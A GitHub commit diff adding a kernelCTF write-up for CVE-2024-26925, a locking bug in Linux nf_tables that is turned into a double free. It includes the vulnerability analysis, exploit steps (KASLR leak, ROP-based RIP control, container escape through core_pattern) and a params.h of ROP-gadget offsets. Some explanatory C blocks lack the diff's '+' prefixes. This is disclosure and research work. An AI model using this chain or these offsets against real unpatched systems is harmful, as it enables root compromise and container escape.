Add kernelCTF CVE-2024-26925_lts_cos (#106)

* Update CVE-2024-26925_lts_cos
* Use softlink to merge all files
* Update exploit.md
* Update vulnerability.md
google · Jul 3, 2024 · 5c8c44e
1 parent fa6e35b
commit 5c8c44e

Showing 21 changed files with 1,410 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md
@@ -0,0 +1,178 @@
+# Exploit details
+The vulnerability is a locking issue in `__nf_tables_abort()`: its call to `nf_tables_module_autoload()`
+releases the commit mutex, which lets the GC sequence protection be bypassed. To exploit this vulnerability,
+we must find a reliable way to race the abort thread against the set GC thread. By doing so, we can turn this
+locking issue into a double-free primitive.
+
+## Module Autoload
+
+Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`, etc.) might reside in external kernel modules, 
+encountering a type currently not present in nftables will first add the typename to `nft_net->module_list` and attempt 
+to load the corresponding type's kernel module during the abort phase via `nf_tables_module_autoload()`. 
+
+Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit.
+
+```c
+static const struct nft_object_type *
+nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+{
+    const struct nft_object_type *type;
+
+    rcu_read_lock();
+    type = __nft_obj_type_get(objtype, family);
+
+    // ...
+
+#ifdef CONFIG_MODULES
+    if (type == NULL) { // if type does not exist
+        if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN)
+            return ERR_PTR(-EAGAIN);
+    }
+#endif
+    return ERR_PTR(-ENOENT);
+}
+```
+
+```c
+__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...)
+{
+    // ...
+
+    nft_net = nft_pernet(net);
+    list_for_each_entry(req, &nft_net->module_list, list) {
+        if (!strcmp(req->module, module_name)) {
+            if (req->done)
+                return 0;
+
+            /* A request to load this module already exists. */
+            return -EAGAIN;
+        }
+    }
+
+    req = kmalloc(sizeof(*req), GFP_KERNEL);
+    if (!req)
+        return -ENOMEM;
+
+    req->done = false;
+    strscpy(req->module, module_name, MODULE_NAME_LEN);
+    list_add_tail(&req->list, &nft_net->module_list); // add to request list
+
+    return -EAGAIN;
+}
+```
+
+## Race to Double Free
+
+With this vulnerability, we can make the set GC procedure record the GC sequence and then acquire the commit mutex
+while `__nf_tables_abort()` is still running, bypassing the GC sequence check. The goal is to free
+the same set element twice during the handling of a batch commit.
+
+The race process is as follows:
+- New `setelem A`
+- New unknown type object (trigger `__nf_tables_abort()`)
+    - `nft_rhash_gc()` records expired `setelem A`
+    - `setelem A` is unlinked from the set and `kfree`'d
+    - module autoload releases mutex lock
+    - `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check
+    - `setelem A` is `kfree`'d a second time
+
+To increase the success rate of the race (and capture the kernelCTF slot), we need to enlarge the two time windows in the race process:
+1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded.
+2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock.
+
+To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of 
+`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order, 
+these operations will be processed before removing `setelem A`. 
+
+In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements, 
+reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit. 
+This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`.
+
+For the module autoload part, requests are not removed from `nft_net->module_list`
+even after autoloading finishes, and `nf_tables_module_autoload()` tries to load every module in the list without
+checking whether `req->done` is set, so each autoload trigger reloads all previously requested types.
+
+```c
+static void nf_tables_module_autoload(struct net *net)
+{
+    struct nftables_pernet *nft_net = nft_pernet(net);
+    struct nft_module_request *req, *next;
+    LIST_HEAD(module_list);
+
+    list_splice_init(&nft_net->module_list, &module_list);
+    mutex_unlock(&nft_net->commit_mutex);
+    list_for_each_entry_safe(req, next, &module_list, list) {
+        request_module("%s", req->module);
+        req->done = true;
+    }
+    mutex_lock(&nft_net->commit_mutex);
+    list_splice(&module_list, &nft_net->module_list);
+}
+```
+
+Therefore, we only need to attempt autoloading non-existent and non-repeating object types N times before 
+the new `setelem A` operation. Finally, triggering autoload with a non-existent object type after the new `setelem A` will trigger `request_module()` N+1 times.
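The counting argument above can be checked with a small userspace model. This is only a sketch of the behaviour described in the text, not kernel code: `toy_net`, `toy_request_module()`, `toy_autoload()` and `TOY_EAGAIN` are hypothetical names, and the list is a fixed array rather than a kernel `list_head`.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REQS   64
#define NAME_LEN   32
#define TOY_EAGAIN 11 /* stand-in for the kernel's EAGAIN */

/* Toy stand-in for struct nft_module_request. */
struct toy_req {
    char module[NAME_LEN];
    bool done;
};

/* Toy stand-in for nft_net->module_list. */
struct toy_net {
    struct toy_req reqs[MAX_REQS];
    size_t nreqs;
};

/* Modelled on nft_request_module(): queue the name unless it is already queued. */
int toy_request_module(struct toy_net *net, const char *name)
{
    for (size_t i = 0; i < net->nreqs; i++) {
        if (strcmp(net->reqs[i].module, name) == 0)
            return net->reqs[i].done ? 0 : -TOY_EAGAIN;
    }

    assert(net->nreqs < MAX_REQS);
    snprintf(net->reqs[net->nreqs].module, NAME_LEN, "%s", name);
    net->reqs[net->nreqs].done = false;
    net->nreqs++;

    return -TOY_EAGAIN;
}

/* Modelled on nf_tables_module_autoload(): every queued entry is loaded
 * again, whether or not it is already marked done, and nothing is removed.
 * Returns the number of simulated request_module() calls. */
size_t toy_autoload(struct toy_net *net)
{
    size_t calls = 0;

    for (size_t i = 0; i < net->nreqs; i++) {
        net->reqs[i].done = true;
        calls++;
    }
    return calls;
}
```

In this model, queuing N distinct names (each followed by an autoload) and then one more name makes the final `toy_autoload()` return N+1, which is the lengthened race window the text relies on.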
+
+With the above adjustments, the batch commit used in the exploit includes the following operations:
+- New unknown type object (1)
+- ...
+- New unknown type object (N)
+- New `setelem A` (kmalloc-cg-256)
+- Delete all dynset expressions (deactivate all pre-allocated setelems)
+- New unknown type object (N+1)
+
+By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right? 
+
+Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds, 
+`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`.
+
+We later found that the `nft_rhash_gc()` work item queued on `system_power_efficient_wq` is not scheduled while CPU usage is high; we did not determine the exact reason.
+
+```c
+static void nft_rhash_gc_init(const struct nft_set *set)
+{
+    struct nft_rhash *priv = nft_set_priv(set);
+
+    queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+        nft_set_gc_interval(set));
+}
+```
+
+In our case, re-activating all pre-allocated set elements
+in `__nf_tables_abort()` causes high CPU usage, so `nft_rhash_gc()` is not scheduled.
+To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race.
+This has an additional benefit: the slab allocator does not detect our double free because the same object is freed by two different CPUs.
+
+Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`.
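Why a free list of `[A, A]` is useful can be illustrated with a toy LIFO free list. This is a deliberately simplified sketch: the real slab allocator keeps per-CPU free lists with the next pointers embedded in the objects, whereas `toy_cache`, `toy_free()` and `toy_alloc()` below are hypothetical names built on a plain array.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_SLOTS 8

/* Toy free list: a stack of pointers to free objects. */
struct toy_cache {
    void *free[TOY_SLOTS];
    size_t nfree;
};

/* Push an object onto the free list; no double-free detection at all. */
void toy_free(struct toy_cache *c, void *obj)
{
    assert(c->nfree < TOY_SLOTS);
    c->free[c->nfree++] = obj;
}

/* Pop the most recently freed object, or NULL if the list is empty. */
void *toy_alloc(struct toy_cache *c)
{
    return c->nfree ? c->free[--c->nfree] : NULL;
}

/* Free the same 256-byte object twice, then allocate twice: both
 * allocations return the same address, so two logically distinct
 * objects end up sharing one piece of memory. */
bool toy_double_free_overlaps(void)
{
    static char slot_a[256];
    struct toy_cache c = {0};

    toy_free(&c, slot_a);
    toy_free(&c, slot_a); /* free list is now [A, A] */

    void *first = toy_alloc(&c);
    void *second = toy_alloc(&c);

    return first == slot_a && second == slot_a;
}
```

In the model, the two allocations that follow the double free alias each other; the following sections depend on the same effect between two kernel objects of the same size class.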
+
+## KASLR Bypass
+
+After obtaining the double-free primitive, we use the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md).
+Since `A` now appears twice in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with an `nft_object` to leak `obj->ops` (the address of `nft_ct_expect_obj_ops`).
+- New `table A` (with `NFTA_TABLE_USERDATA` data of length 256)
+- New `object B` (`nft_ct_expect_obj`)
+- Dump `table A` (leaking `object B` structure)
+
+After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations.
+
+## Control RIP
+
+At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling RIP.
+
+We first leak the kernel heap address that will hold the fake `obj->ops` function pointer table:
+- New `table A` (with `NFTA_TABLE_USERDATA` data of length 256)
+- New `table B` (with `NFTA_TABLE_USERDATA` data of length 256)
+- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`)
+- Dump `table A` (leaking `obj->udata`)
+
+Then we reallocate the table to modify the overlapped `object C` and call `obj->ops->dump` to trigger the ROP chain:
+- Delete `table A`
+- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain)
+- Dump `object C` (triggering ROP chain)
+
+## Container Escape
+
+We reuse the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape).
+
+By rewriting `core_pattern` to `|/proc/%P/fd/<fd number>` and placing the binary in the corresponding fd via `memfd_create()`, 
+we can execute any binary outside the container when a coredump is triggered.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md
@@ -0,0 +1,174 @@
+# Vulnerability Details
+A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`).
+It breaks an assumption made by the asynchronous set GC, which can be used to cause a double free.
+
+The asynchronous set GC (`nft_rhash_gc`, for example) does not acquire the commit lock while doing its work;
+instead, it uses the GC sequence (`gc_seq`) mechanism to protect itself from racing with a transaction.
+At the beginning of `nft_rhash_gc`, it saves the current GC sequence and allocates a GC transaction
+to store information, then traverses the set to record all expired set elements in the GC transaction,
+and finally calls `nft_trans_gc_queue_async_done(gc)`.
+
+```c
+static void nft_rhash_gc(struct work_struct *work)
+{
+	// ...
+	gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence
+
+	if (nft_set_gc_is_pending(set))
+		goto done;
+
+	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
+	if (!gc)
+		goto done;
+
+	// ...
+	while ((he = rhashtable_walk_next(&hti))) {
+		// check if setelem expired
+		if (!nft_set_elem_expired(&he->ext))
+			continue;
+
+		// ...
+		nft_trans_gc_elem_add(gc, he);
+	}
+
+	if (gc)
+		nft_trans_gc_queue_async_done(gc);
+
+	// ...
+}
+```
+
+The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules 
+`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the GC transaction and calls `nft_trans_gc_work_done()`
+to check the GC sequence.
+
+```c
+static void nft_trans_gc_work(struct work_struct *work)
+{
+	// ...
+	list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
+		list_del(&trans->list);
+		if (!nft_trans_gc_work_done(trans)) { // do the check here
+			nft_trans_gc_destroy(trans);
+			continue;
+		}
+		call_rcu(&trans->rcu, nft_trans_gc_trans_free);
+	}
+}
+```
+
+The function `nft_trans_gc_work_done()` first acquires the commit lock and compares the saved GC sequence
+with the current GC sequence. All critical sections that modify the control plane are surrounded by
+`nft_gc_seq_begin()` and `nft_gc_seq_end()`, which both increase the current GC sequence (`nft_net->gc_seq`).
+If the two values differ, the GC raced with a transaction and the state of the set may have changed,
+so the function returns false to stop processing this GC transaction.
+
+
+```c
+static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
+{
+	struct nftables_pernet *nft_net;
+	struct nft_ctx ctx = {};
+
+	nft_net = nft_pernet(trans->net);
+
+	mutex_lock(&nft_net->commit_mutex); // acquire global mutex
+
+	/* Check for race with transaction, otherwise this batch refers to
+	 * stale objects that might not be there anymore. Skip transaction if
+	 * set has been destroyed from control plane transaction in case gc
+	 * worker loses race.
+	 */
+	if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race
+		mutex_unlock(&nft_net->commit_mutex);
+		return false;
+	}
+
+	ctx.net = trans->net;
+	ctx.table = trans->set->table;
+
+	nft_trans_gc_setelem_remove(&ctx, trans);
+	mutex_unlock(&nft_net->commit_mutex);
+
+	return true;
+}
+```
+
+However, the GC sequence mechanism only works under the assumption that the commit lock should not be released
+during the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread
+may record the expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check.
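The assumption described above can be made concrete with a single-threaded toy model of the sequence counter. This is a sketch only: it has no real locking or threads, the two scenarios simply replay the interleavings in program order, and all `toy_*` and `scenario_*` names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of nft_net->gc_seq. */
struct toy_pernet {
    unsigned int gc_seq;
};

/* Modelled on nft_gc_seq_begin(): bump the sequence on entry. */
unsigned int toy_gc_seq_begin(struct toy_pernet *n)
{
    return ++n->gc_seq;
}

/* Modelled on nft_gc_seq_end(): bump the sequence again on exit. */
void toy_gc_seq_end(struct toy_pernet *n, unsigned int gc_seq)
{
    n->gc_seq = gc_seq + 1;
}

/* The comparison made in nft_trans_gc_work_done(): true means the GC
 * transaction is considered safe to process. */
bool toy_gc_check(const struct toy_pernet *n, unsigned int saved_seq)
{
    return n->gc_seq == saved_seq;
}

/* Scenario 1: the GC snapshots gc_seq before the transaction starts and
 * can only take the lock after it ends. The sequence has moved on, so
 * the check rejects the stale GC transaction. */
bool scenario_lock_held(void)
{
    struct toy_pernet n = { .gc_seq = 0 };
    unsigned int saved = n.gc_seq;        /* GC records expired elements */
    unsigned int seq = toy_gc_seq_begin(&n);

    /* ... transaction modifies the set while holding the lock ... */
    toy_gc_seq_end(&n, seq);

    return toy_gc_check(&n, saved);
}

/* Scenario 2: the GC snapshots gc_seq inside the critical section, and
 * the lock is dropped before nft_gc_seq_end(). The GC obtains the lock
 * while the sequence is unchanged, so the check passes. */
bool scenario_lock_dropped(void)
{
    struct toy_pernet n = { .gc_seq = 0 };
    unsigned int seq = toy_gc_seq_begin(&n);
    unsigned int saved = n.gc_seq;        /* GC records expired elements */

    /* ... lock released here; GC worker acquires it and checks ... */
    bool passed = toy_gc_check(&n, saved);

    toy_gc_seq_end(&n, seq);
    return passed;
}
```

In this model `scenario_lock_held()` returns false and `scenario_lock_dropped()` returns true: the check compares only counter values, so it cannot tell that the set was modified earlier in the same critical section.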
+
+`__nf_tables_abort()` is where this assumption is violated. The function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`,
+and if it receives the action `NFNL_ABORT_AUTOLOAD`, it calls `nf_tables_module_autoload()` to process the module requests.
+However, `nf_tables_module_autoload()` releases the commit lock before processing the module requests, which breaks the assumption behind the GC
+sequence and leads to a double free.
+
+```c
+static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+			   enum nfnl_abort_action action)
+{
+	gc_seq = nft_gc_seq_begin(nft_net);   // gc_seq++
+	ret = __nf_tables_abort(net, action);
+	nft_gc_seq_end(nft_net, gc_seq);      // gc_seq++
+	mutex_unlock(&nft_net->commit_mutex);
+
+	return ret;
+}
+
+static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+{
+	// ...
+
+	if (action == NFNL_ABORT_AUTOLOAD)
+		nf_tables_module_autoload(net); // load modules
+	else
+		nf_tables_module_autoload_cleanup(net);
+
+	return 0;
+}
+
+static void nf_tables_module_autoload(struct net *net)
+{
+	struct nftables_pernet *nft_net = nft_pernet(net);
+	struct nft_module_request *req, *next;
+	LIST_HEAD(module_list);
+
+	list_splice_init(&nft_net->module_list, &module_list);
+	mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section
+	list_for_each_entry_safe(req, next, &module_list, list) {
+		request_module("%s", req->module);
+		req->done = true;
+	}
+	mutex_lock(&nft_net->commit_mutex);
+	list_splice(&module_list, &nft_net->module_list);
+}
+```
+
+## Requirements to trigger the vulnerability
+- Capabilities: `CAP_NET_ADMIN` capability is required.
+- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`
+- User namespace: As this vulnerability requires `CAP_NET_ADMIN`, which is not usually granted to normal users, we use an unprivileged user namespace to obtain this capability.
+
+## Commit which introduced the vulnerability
+- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae)
+- An incomplete fix to the new GC transaction API introduced this vulnerability.
+
+## Commit which fixed the vulnerability
+- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27)
+- The commit moves the call to `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check.
+
+## Affected kernel versions
+- Linux versions v6.5 ~ v6.9-rc2 are affected by this vulnerability
+- For LTS versions
+	- v5.15.134 ~
+	- v6.1.56 ~
+
+## Affected component, subsystem
+- netfilter/nf_tables
+
+## Cause (UAF, BoF, race condition, double free, refcount overflow, etc)
+- Locking issue leads to double free
+
+## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.)
+- Disabling the syscalls used to reach the netfilter (specifically, nftables) subsystem (e.g., `socket`, `sendmsg` with a netlink socket) prevents this vulnerability from being triggered.
+- Disabling the syscalls used to create unprivileged user namespaces (e.g., `clone`, `unshare`) reduces the attack surface, since the netfilter subsystem requires `CAP_NET_ADMIN`.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile
@@ -0,0 +1 @@
+../lts-6.1.81/Makefile
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz
@@ -0,0 +1 @@
+../lts-6.1.81/deps.tar.gz
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c
@@ -0,0 +1 @@
+../lts-6.1.81/exp.c
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h
@@ -0,0 +1,16 @@
+#include <stddef.h>
+#include <unistd.h>
+size_t nft_ct_expect_obj_type = 0x271c120;
+size_t nft_ct_expect_obj_ops = 0x1acba40;
+size_t core_pattern = 0x259e7a0;
+size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here)
+size_t copy_from_user = 0x776520;
+size_t delay_loop = 0x7d6c70;
+
+size_t pop_rdi = 0x81910;
+size_t pop_rsi = 0x1a9d38;
+size_t pop_rdx = 0x1a9725;
+size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret
+size_t pop_rsp_ret = 0x106deb;
+size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret)
+size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39]
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c
@@ -0,0 +1 @@
+../lts-6.1.81/root.c
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh
@@ -0,0 +1 @@
+../lts-6.1.81/run.sh
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h
@@ -0,0 +1 @@
+../lts-6.1.81/tools.h